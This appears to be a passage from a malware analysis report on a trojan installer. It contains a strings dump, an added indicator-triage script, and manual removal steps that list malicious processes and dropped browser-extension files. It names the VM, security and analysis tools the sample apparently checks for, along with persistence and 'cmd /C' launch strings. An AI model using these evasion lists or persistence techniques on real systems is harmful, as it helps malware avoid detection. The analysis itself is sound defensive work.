KVwsc.exe
FilMsg.exe
secenter.exe
coreServiceShell.exe
Portuguese(Brazilian)
Portuguese(Standard)
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
000000000000000
0000000
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\
siql.exe
ppData\Local\Temp\00026416\popnew.xml
1.0.1.32
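The strings above carry the indicators a reviewer pulls out of a dump like this by hand: the defanged contact URLs (xiaobingdou.com, pop.yeaplayer.com, config/down.yeadesktop.com), the telemetry beacon templates that start with `?h=X-X-X-X-X-X&r=%s_%s`, the Run-key and `/autostart` persistence strings, the `cmd /C %s` launcher, and the list of VM guest-tool, security-product and analysis-tool process names the sample carries. The script below is an added triage example, not code from the report or from the sample; it re-fangs the report's `hXXp://` and `VVV.` notation, buckets those indicators, and runs on a constructed input of lines copied from this dump. The category lists (which names count as VM tooling, security products or analysis tools) are this example's own assumptions, seeded from names that appear above.

```python
"""Strings-dump triage (added example; not the report's or the sample's code).

Reads lines in the report's defanged form (hXXp://, VVV.), re-fangs them and
buckets the indicators a reviewer wants from a memory-strings dump: contacted
hosts, the beacon query-string parameter names, process names the sample
enumerates (VM guest tools, security products, analysis tools), persistence
strings and shell-execution strings. Category lists are assumptions.
"""
import re
from urllib.parse import urlsplit

# Constructed sample input: lines copied from the dump, in the report's notation.
SAMPLE_DUMP = """\
hXXp://xiaobingdou.com/online.aspx
hXXp://pop.yeaplayer.com/click.aspx
hXXp://VVV.googleadservices.com
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=1
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&finish=%s --- sdadsada
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
%s /autostart
VBoxTray.exe
vmtoolsd.exe
360tray.exe
avp.exe
procexp.exe
cmd /C %s
config.yeadesktop.com
down.yeadesktop.com
webad.xml
src\\NamePool.cpp
"""

# Assumed categories for the process names seen in the dump.
VM_GUEST_PROCS = {"vboxtray.exe", "vboxservice.exe", "vmwareuser.exe",
                  "vmwaretray.exe", "vmupgradehelper.exe", "vmtoolsd.exe",
                  "vmacthlp.exe"}
SECURITY_PROCS = {"360sd.exe", "360rp.exe", "360safe.exe", "360tray.exe",
                  "avp.exe", "avgui.exe", "avguard.exe", "avastui.exe",
                  "baiduan.exe", "baidusd.exe", "ccsvchst.exe"}
ANALYSIS_PROCS = {"procexp.exe", "taskmgr.exe"}
# Bare "name.ext" lines that look like hostnames but are files.
NON_HOST_SUFFIXES = {"exe", "dll", "cpp", "h", "pdb", "xml", "ini", "log",
                     "png", "tmp", "aspx", "htm", "html", "bin", "lnk"}

BEACON_RE = re.compile(r"^\?h=X-X-X-X-X-X&r=%s_%s")
QUERY_KEY_RE = re.compile(r"[?&]([A-Za-z]+)=")
BARE_HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)


def refang(s: str) -> str:
    """Undo the report's defanging so URLs parse with the standard library."""
    return (s.replace("hXXps://", "https://")
             .replace("hXXp://", "http://")
             .replace("VVV.", "www."))


def triage(dump: str) -> dict:
    """Bucket each non-empty line of the dump into an indicator category."""
    hits = {"hosts": set(), "beacon_params": set(), "vm_guest": set(),
            "security": set(), "analysis": set(), "persistence": [], "shell": []}
    for raw in dump.splitlines():
        line = refang(raw.strip())
        if not line:
            continue
        low = line.lower()
        if low.startswith(("http://", "https://")):
            hits["hosts"].add(urlsplit(line).hostname)
        elif low in VM_GUEST_PROCS:
            hits["vm_guest"].add(low)
        elif low in SECURITY_PROCS:
            hits["security"].add(low)
        elif low in ANALYSIS_PROCS:
            hits["analysis"].add(low)
        elif BEACON_RE.match(line):
            # Keep only the template part; the " --- " tail is a build-time marker.
            hits["beacon_params"].update(QUERY_KEY_RE.findall(line.split(" --- ")[0]))
        elif "\\currentversion\\run" in low or low.endswith("/autostart"):
            hits["persistence"].append(line)
        elif low.startswith(("cmd /c", "cmd.exe")):
            hits["shell"].append(line)
        elif BARE_HOST_RE.match(line) and line.rsplit(".", 1)[1].lower() not in NON_HOST_SUFFIXES:
            hits["hosts"].add(low)
    return hits


if __name__ == "__main__":
    for category, values in triage(SAMPLE_DUMP).items():
        print(f"{category}: {sorted(values)}")
```

Feed it the full dump (one string per line, as printed above) to get a first-pass IOC list; the bare-hostname rule is deliberately conservative, so anything it drops (for example a hostname that happens to end in a listed suffix) still has to be checked by eye.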

webfriend2.exe_2756:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
uxtheme.dll
userenv.dll
setupapi.dll
apphelp.dll
propsys.dll
dwmapi.dll
cryptbase.dll
oleacc.dll
version.dll
profapi.dll
comres.dll
clbcatq.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.7)
Inno Setup Messages (5.5.3)
mu2.iu
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
'%s' is not a valid integer value
'%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time
'%s' is not a valid date and time
I/O error %d
Integer overflow
Invalid floating point operation
Invalid pointer operation
Invalid class typecast
Access violation at address %p. %s of address %p
Operation aborted
Exception %s in module %s at %p.
Application Error
Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation
Variant method calls not supported
External exception %x
1.0.0.0
1.0.0.0

webfriend2.tmp_2704:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
uxtheme.dll
userenv.dll
setupapi.dll
apphelp.dll
propsys.dll
dwmapi.dll
cryptbase.dll
oleacc.dll
version.dll
profapi.dll
comres.dll
clbcatq.dll
%s_%d
EInvalidOperation
TKeyEvent
TKeyPressEvent
crSQLWait
EInvalidGraphicOperation
TWindowState
poProportional
KeyPreviewT
WindowState`
OnKeyDownD1A
OnKeyPress
OnKeyUp\0A
CTL3D32.DLL
PasswordCharD
ssHorizontal
OnKeyUp
RegDeleteKeyExA
advapi32.dll
.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
TPSCustomDebugExec
TPSDebugExec
RICHED20.DLL
RICHED32.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
shell32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
TPasswordEdit
PasswordEdit(
PasswordD
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel$
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
CheckPassword
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.9 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
%s: The existing file appears to be in use (%d). Will replace on restart.
%s: The existing file appears to be in use (%d). Retrying.
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Section: %s
Entry: %s
Value: %s
Updating the .INI file.
Successfully updated the .INI file.
Skipping updating the .INI file, only updating uninstall log.
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
PasswordCheckHash
Expression error '%s'
Password
SuppressMsgBoxes
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
shfolder.dll
_isetup\_shfoldr.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
Windows
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.9 (a)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.9 (a)
Portions Copyright (C) 2000-2016 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
PasswordEdit
PasswordEditLabel
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Cannot call "%s" function during non Unicode Setup or Uninstall
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
Invalid RootKey value
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
Unknown custom message name "%s"
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
%u.%.2u.%u
SUPPRESSIBLEMSGBOX
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
GetWindowsVersionEx
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
IMsgt
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
FTPF0P
0123456789abcdefInno Setup Setup Data (5.5.7)
Inno Setup Messages (5.5.3)
0ku2.iu
oleaut32.dll
RegQueryInfoKeyA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetWindowsDirectoryA
CreateNamedPipeA
mpr.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
comctl32.dll
ole32.dll
ShellExecuteExA
ShellExecuteA
comdlg32.dll
msimg32.dll
.text
`.rdata
@.data
.pdata
@.rsrc
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXMZ
`.data
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryW
RegOpenKeyA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s
Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance
Class %s not found
Resource %s not found!Resource %s is of incorrect class
List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates
Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name
A class named %s already exists#''%s'' is not a valid integer value
Error reading %s.%s: %s
Ancestor for '%s' not found
Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application
Could not load CARDS.DLL
Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Grid too large for operation Too many rows or columns deleted
%s on line %d
''%s'' expected
%s expected
Invalid input value7Invalid input value. Use escape key to abandon changes
Value must be between %d and %d<Cannot create a default method name for an unnamed component
''%s'' is not a valid date
''%s'' is not a valid time#''%s'' is not a valid date and time
Invalid file name - %s
All files (*.*)|*.*
&Files: (*.*)
Invalid clipboard format Clipboard does not support Icons
Custom Colors Operation not supported on selected printer.There is no default printer currently selected
Unable to write to %s
Invalid data type for '%s'
Failed to create key %s
Failed to set data for '%s'
Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)
/Menu '%s' is already being used by another form
Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s
Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.52.0.0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    20002.exe:3588
    20002.exe:284
    webfriend2.exe:2756
    %original file name%.exe:3380
    msiql.exe:1660
    msiql.exe:3536
    rundll32.exe:2532

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (2392 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (2392 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (8184 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (532 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (8560 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
